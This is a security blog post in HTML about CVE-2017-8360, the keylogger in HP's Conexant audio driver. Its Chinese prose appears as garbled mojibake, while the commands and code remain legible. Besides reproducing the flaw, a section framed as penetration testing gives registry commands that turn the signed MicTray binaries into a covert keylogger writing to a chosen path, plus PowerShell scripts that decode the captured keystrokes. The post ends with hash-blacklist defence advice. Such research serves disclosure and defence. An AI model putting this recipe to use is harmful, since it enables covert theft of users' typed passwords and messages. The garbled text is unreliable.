I"Ø+<h2 id="0x00-å‰è¨€">0x00 å‰è¨€</h2>
<hr />

<p>2017å¹´5æœˆï¼Œç‘å£«å®‰å…¨å…¬å¸Modzeroçš„å®‰å…¨ç ”ç©¶å‘˜Thorsten Schroederå‘ç°HPçš„ConexantéŸ³é¢‘é©±åŠ¨ä¸­å­˜åœ¨Keyloggerï¼Œéæ³•è®°å½•ç”¨æˆ·çš„é”®ç›˜è¾“å…¥ã€‚
æœ¬æ–‡ä»…åœ¨æŠ€æœ¯ç ”ç©¶çš„è§’åº¦ï¼Œæµ‹è¯•å’Œåˆ†æåˆ©ç”¨æ–¹æ³•ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ï¼Œçº æ­£éƒ¨åˆ†æ–‡ç« ä¸­å‡ºç°çš„é”™è¯¯ç†è§£ã€‚</p>

<h2 id="0x01-ç®€ä»‹">0x01 ç®€ä»‹</h2>
<hr />

<p>æœ¬æ–‡å°†è¦ä»‹ç»ä»¥ä¸‹å†…å®¹ï¼š</p>

<ul>
  <li>æ¼æ´ç®€è¦ä»‹ç»</li>
  <li>æ¼æ´å¤ç°</li>
  <li>åˆ©ç”¨æ€è·¯</li>
  <li>é˜²å¾¡å»ºè®®</li>
</ul>

<h2 id="0x02-æ¼æ´ç®€è¦ä»‹ç»">0x02 æ¼æ´ç®€è¦ä»‹ç»</h2>
<hr />

<p>å¯ä¾›å‚è€ƒçš„èµ„æ–™ï¼š</p>

<p>https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt</p>

<p>ç”¨æˆ·åœ¨å®‰è£…HPçš„ConexantéŸ³é¢‘é©±åŠ¨åï¼Œå°†ä¼šåˆ›å»ºè®¡åˆ’ä»»åŠ¡ï¼Œåœ¨ç”¨æˆ·ç™»å½•åæ‰§è¡Œæ–‡ä»¶MicTray.exe</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>32ä½ç¨‹åºä¸ºMicTray.exeï¼Œ64ä½ç¨‹åºä¸ºMicTray64.exe</p>

<p>å¯åŠ¨MicTray.exeä¼šè®°å½•ç”¨æˆ·çš„é”®ç›˜è¾“å…¥ï¼Œä»¥ä¸¤ç§æ–¹å¼ä¿å­˜ï¼š</p>

<ul>
  <li>å†™å…¥æ–‡ä»¶<code class="language-plaintext highlighter-rouge">C:\Users\Public\MicTray.log</code></li>
  <li>é€šè¿‡WinAPI OutputDebugString()è®°å½•å†…å®¹ï¼Œå¯è¢«å…¶ä»–ç¨‹åºè¯»å–</li>
</ul>

<h2 id="0x03-æ¼æ´å¤ç°">0x03 æ¼æ´å¤ç°</h2>
<hr />

<p>å…³äºæ¼æ´å¤ç°çš„å‚è€ƒèµ„æ–™ï¼š</p>

<p>https://diablohorn.com/2017/05/12/repurposing-the-hp-audio-key-logger/</p>

<p>æœ¬èŠ‚ä¼šå¯¹å‚è€ƒèµ„æ–™ä¸­çš„å†…å®¹åšæ‰©å±•ï¼Œä»‹ç»è¯»å–OutputDebugString()ä¸­è®°å½•çš„æ–¹æ³•</p>

<p>å­˜åœ¨æ¼æ´çš„é©±åŠ¨ä¸‹è½½åœ°å€ï¼š</p>

<p>ftp://whp-aus1.cold.extweb.hp.com/pub/softpaq/sp79001-79500/sp79420.html</p>

<p>è¯¥åœ°å€å·²ç»å¤±æ•ˆï¼Œå•ä¸ªæ–‡ä»¶çš„ä¸‹è½½åœ°å€ï¼š</p>

<p>MicTray.exeï¼š</p>

<p>https://www.virustotal.com/nl/file/e882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84/analysis/</p>

<p>MicTray64.exeï¼š</p>

<p>https://www.virustotal.com/nl/file/c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8/analysis/</p>

<p>æµ‹è¯•ç³»ç»Ÿï¼š Win7 x64(æ›´æ–°è¡¥ä¸)</p>

<h3 id="è®°å½•æ–¹æ³•1å°†é”®ç›˜è®°å½•å†…å®¹å†™å…¥æ–‡ä»¶cuserspublicmictraylog">è®°å½•æ–¹æ³•1.å°†é”®ç›˜è®°å½•å†…å®¹å†™å…¥æ–‡ä»¶<code class="language-plaintext highlighter-rouge">C:\Users\Public\MicTray.log</code></h3>

<h4 id="1æ·»åŠ æ³¨å†Œè¡¨">(1)æ·»åŠ æ³¨å†Œè¡¨</h4>

<p>ä½¿ç”¨MicTray.exeï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hklm\SOFTWARE\Wow6432Node\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
</code></pre></div></div>

<p>ä½¿ç”¨MicTray64.exeï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
</code></pre></div></div>

<p>äºŒé€‰ä¸€å³å¯</p>

<p>æœ¬æ¬¡æµ‹è¯•é€‰æ‹©MicTray64.exe</p>

<h4 id="2è¿è¡Œmictrayexemictray64exe">(2)è¿è¡ŒMicTray.exe/MicTray64.exe</h4>

<p>ç”Ÿæˆè®°å½•æ–‡ä»¶æ–‡ä»¶<code class="language-plaintext highlighter-rouge">C:\Users\Public\MicTray.log</code></p>

<p>è®°å½•é”®ç›˜è¾“å…¥å†…å®¹ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/2-1.png" alt="Alt text" /></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä½æƒé™è¿è¡Œå³å¯ï¼Œæƒ³è¦è®°å½•é«˜æƒé™ç¨‹åºä¸­çš„é”®ç›˜è¾“å…¥ï¼Œéœ€è¦é«˜æƒé™è¿è¡Œ</p>

<h3 id="è®°å½•æ–¹æ³•2é€šè¿‡outputdebugstringè¾“å‡ºé”®ç›˜è®°å½•å†…å®¹">è®°å½•æ–¹æ³•2.é€šè¿‡OutputDebugString()è¾“å‡ºé”®ç›˜è®°å½•å†…å®¹</h3>

<p>å¯ä»¥é€šè¿‡DbgViewè¯»å–WinAPI OutputDebugString()çš„è¾“å‡ºå†…å®¹</p>

<p>ä¸‹è½½åœ°å€ï¼š</p>

<p>https://live.sysinternals.com/Dbgview.exe</p>

<p>ç”±äºæ— æ³•è·å¾—HP ConexantéŸ³é¢‘é©±åŠ¨çš„å®‰è£…åŒ…ï¼Œè¿™é‡Œé€‰æ‹©ä½¿ç”¨Procmonå¯»æ‰¾è§¦å‘æ–¹å¼</p>

<p><strong>æ³¨ï¼š</strong></p>

<p>ä¹Ÿå¯ä»¥å¯¹å…¶åŠ¨æ€è°ƒè¯•ï¼Œæ‰¾åˆ°å‡½æ•°åˆ¤æ–­æ¡ä»¶</p>

<p>ä½¿ç”¨Procmonç›‘æ§MicTray64.exeåœ¨è¿è¡Œæ—¶å¯¹æ³¨å†Œè¡¨çš„æ“ä½œï¼Œè®°å½•æ–¹æ³•1ï¼ˆå†™å…¥æ–‡ä»¶ï¼‰çš„æ³¨å†Œè¡¨æ“ä½œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/2-2.png" alt="Alt text" /></p>

<p>DbgViewè¾“å‡ºå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/2-3.png" alt="Alt text" /></p>

<p>å°è¯•è§£å†³é”™è¯¯ï¼Œæ·»åŠ æ³¨å†Œè¡¨é¡¹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v HotKeyMicScancode /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v HotKeySpkScancode /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v PlaybackGPIO /t REG_DWORD /d 1
reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CaptureGPIO /t REG_DWORD /d 1
</code></pre></div></div>

<p><strong>æ³¨ï¼š</strong></p>

<p>MicTray64.exeè¿è¡Œåä¼šè‡ªåŠ¨åœ¨æ³¨å†Œè¡¨<code class="language-plaintext highlighter-rouge">hkcu\SOFTWARE\Conexant</code>æ·»åŠ é…ç½®ä¿¡æ¯</p>

<p>ç»æµ‹è¯•ï¼Œè¿˜éœ€è¦æ¸…é™¤æ³¨å†Œè¡¨ä¸­çš„é…ç½®ä¿¡æ¯ï¼Œå¦åˆ™DbgViewæ— æ³•è·å¾—é”®ç›˜è®°å½•</p>

<p>æ¸…é™¤é…ç½®ä¿¡æ¯ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg delete hkcu\SOFTWARE\Conexant /f 
</code></pre></div></div>

<p>é‡æ–°å¯åŠ¨MicTray64.exeï¼ŒæˆåŠŸè·å¾—é”®ç›˜è®°å½•æ¶ˆæ¯ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/2-4.png" alt="Alt text" /></p>

<p>ç»¼ä¸Šï¼Œè®°å½•æ–¹æ³•2ï¼ˆé€šè¿‡OutputDebugString()è¾“å‡ºï¼‰çš„è§¦å‘æ¡ä»¶å¦‚ä¸‹ï¼š</p>

<ul>
  <li>ä¸å­˜åœ¨æ³¨å†Œè¡¨é¡¹hkcu\SOFTWARE\Conexant</li>
  <li>é…ç½®ä»¥ä¸‹æ³¨å†Œè¡¨é¡¹ï¼š
  reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
  reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v HotKeyMicScancode /t REG_DWORD /d 1
  reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v HotKeySpkScancode /t REG_DWORD /d 1
  reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v PlaybackGPIO /t REG_DWORD /d 1
  reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CaptureGPIO /t REG_DWORD /d 1</li>
</ul>

<h2 id="0x04-åˆ©ç”¨æ€è·¯">0x04 åˆ©ç”¨æ€è·¯</h2>
<hr />

<p>ç«™åœ¨æ¸—é€æµ‹è¯•çš„è§’åº¦ï¼Œåˆ†æå¯ä¾›åˆ©ç”¨çš„æ€è·¯</p>

<p>é€šè¿‡ä¿®æ”¹æ³¨å†Œè¡¨å¯ä»¥ä¿®æ”¹è®°å½•æ–‡ä»¶çš„ä¿å­˜ä½ç½®ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hkcu\SOFTWARE\Conexant\MicTray64.exe /v LogName /t REG_SZ /d "C:\test\log.txt"
</code></pre></div></div>

<h3 id="1é’ˆå¯¹32ä½ç³»ç»Ÿçš„é”®ç›˜è®°å½•">1ã€é’ˆå¯¹32ä½ç³»ç»Ÿçš„é”®ç›˜è®°å½•</h3>

<p>é…ç½®å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hkcu\SOFTWARE\Conexant\MicTray.exe /v LogName /t REG_SZ /d "C:\test\log.txt"
reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
</code></pre></div></div>

<p>æ‰§è¡ŒMicTray.exeåï¼Œè®°å½•æ–‡ä»¶ä¿å­˜åœ¨<code class="language-plaintext highlighter-rouge">C:\test\log.txt</code></p>

<h3 id="2é’ˆå¯¹64ä½ç³»ç»Ÿçš„é”®ç›˜è®°å½•">2ã€é’ˆå¯¹64ä½ç³»ç»Ÿçš„é”®ç›˜è®°å½•</h3>

<p>32ä½ç¨‹åº(MicTray.exe)çš„é…ç½®å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hkcu\SOFTWARE\Conexant\MicTray.exe /v LogName /t REG_SZ /d "C:\test\log.txt"
reg add hklm\SOFTWARE\Wow6432Node\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
</code></pre></div></div>

<p>64ä½ç¨‹åº(MicTray64.exe)çš„é…ç½®å‘½ä»¤å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>reg add hkcu\SOFTWARE\Conexant\MicTray64.exe /v LogName /t REG_SZ /d "C:\test\log.txt"
reg add hklm\SOFTWARE\Conexant\MicTray\Hotkey /v CustomSettings /t REG_DWORD /d 1
</code></pre></div></div>

<p>è¯¥å·¥å…·é€šè¿‡è°ƒç”¨WinAPI SetwindowsHookEx()å®ç°é”®ç›˜è®°å½•ï¼Œç›¸å¯¹äºå¸¸è§„çš„é”®ç›˜è®°å½•ç¨‹åºï¼Œä¼˜ç‚¹åœ¨äºåŒ…å«æ•°å­—ç­¾å</p>

<p>å¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/3-1.png" alt="Alt text" /></p>

<h3 id="3è§£æé”®ç›˜è®°å½•å†…å®¹">3ã€è§£æé”®ç›˜è®°å½•å†…å®¹</h3>

<p>æ—¥å¿—æ–‡ä»¶è®°å½•çš„æ˜¯é”®ç›˜çš„è™šæ‹Ÿé”®ç </p>

<p>å¯ä»¥é€šè¿‡è„šæœ¬å®ç°å°†è™šæ‹Ÿé”®ç è½¬æ¢ä¸ºé”®ç›˜æŒ‰é”®çš„åç§°</p>

<p>æµ‹è¯•å‚è€ƒé“¾æ¥ä¸­çš„powershellä»£ç ï¼š</p>

<p>https://www.modzero.ch/advisories/MZ-17-01-Conexant-Keylogger.txt</p>

<p>ä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$filename = "c:\users\public\MicTray.log"

[System.IO.FileStream]   $fs = [System.IO.File]::Open(
      $filename, 
      [System.IO.FileMode]::Open, 
      [System.IO.FileAccess]::Read, 
      [System.IO.FileShare]::ReadWrite)
         
[System.IO.StreamReader] $fr = [System.IO.StreamReader]::new(
      $fs, 
      [Text.UTF8Encoding]::UNICODE)

$el = 0

while($el -lt 2) {
   
   $line = $fr.ReadLine()

   # handle broken newlines in log...
   if([string]::IsNullOrEmpty($line)) {
      $el++
   } else {
      $el=0
   }

   $mc = [regex]::Match($line, 
         "MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$")
   $r = $mc.Groups[2].Value

   if(-Not [string]::IsNullOrEmpty($r)) {
      $i = [convert]::ToInt32($r, 16)
      $c = [convert]::ToChar($i)
      
      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }
         
      write-host -NoNewLine $("{0}" -f $c)
   }
}
</code></pre></div></div>

<p>æˆ‘åœ¨æµ‹è¯•æ—¶ä»£ç æŠ¥é”™ï¼Œå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/3-2.png" alt="Alt text" /></p>

<p>è¿™é‡Œæä¾›ä¸€ä¸ªç®€å•çš„è§£å†³æ–¹æ³•ï¼Œä»£ç å¦‚ä¸‹ï¼š</p>

<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$filename = "c:\users\public\MicTray.log"
$fr = Get-Content $filename
foreach ($line in $fr)
{
   $mc = [regex]::Match($line, 
         "MicTray64.exe.*flags (0x0[A-Fa-f0-9]?).*vk (0x[A-Fa-f0-9]+)$")
   $r = $mc.Groups[2].Value

   if(-Not [string]::IsNullOrEmpty($r)) {
      $i = [convert]::ToInt32($r, 16)
      $c = [convert]::ToChar($i)
      
      if($i -lt 0x20 -or $i -gt 0x7E) { $c = '.' }
         
      write-host -NoNewLine $("{0}" -f $c)
   }
}
</code></pre></div></div>

<p>è½¬æ¢åçš„è¾“å‡ºå¦‚ä¸‹å›¾</p>

<p><img src="https://raw.githubusercontent.com/3gstudent/BlogPic/master/2018-10-1/3-3.png" alt="Alt text" /></p>

<h2 id="0x05-é˜²å¾¡å»ºè®®">0x05 é˜²å¾¡å»ºè®®</h2>
<hr />

<p>æ·»åŠ æ–‡ä»¶é»‘åå•</p>

<p>MicTray.exeï¼š</p>

<p>SHA256:	<code class="language-plaintext highlighter-rouge">e882149c43976dfadb2746eb2d75a73f0be5aa193623b18b50827f43cce3ed84</code></p>

<p>MicTray64.exe:</p>

<p>SHA256:	<code class="language-plaintext highlighter-rouge">c046c7f364b42388bb392874129da555d9c688dced3ac1d6a1c6b01df29ea7a8</code></p>

<p><strong>æ³¨ï¼š</strong></p>

<p>æ›´æ–°Windowsè¡¥ä¸å¹¶ä¸èƒ½é˜»æ­¢è¯¥ç¨‹åºçš„è¿è¡Œ</p>

<h2 id="0x06-å°ç»“">0x06 å°ç»“</h2>
<hr />

<p>æœ¬æ–‡å¤ç°äº†CVE-2017-8360(Keylogger in HP Audio Driver)é”®ç›˜è®°å½•çš„æ–¹æ³•ï¼Œåˆ†æåˆ©ç”¨æ€è·¯ï¼Œæ”¹è¿›æµ‹è¯•è„šæœ¬ï¼Œç»™å‡ºé˜²å¾¡å»ºè®®ã€‚</p>

<hr />

<p><a href="https://github.com/3gstudent/feedback/issues/new">LEAVE A REPLY</a></p>

:ET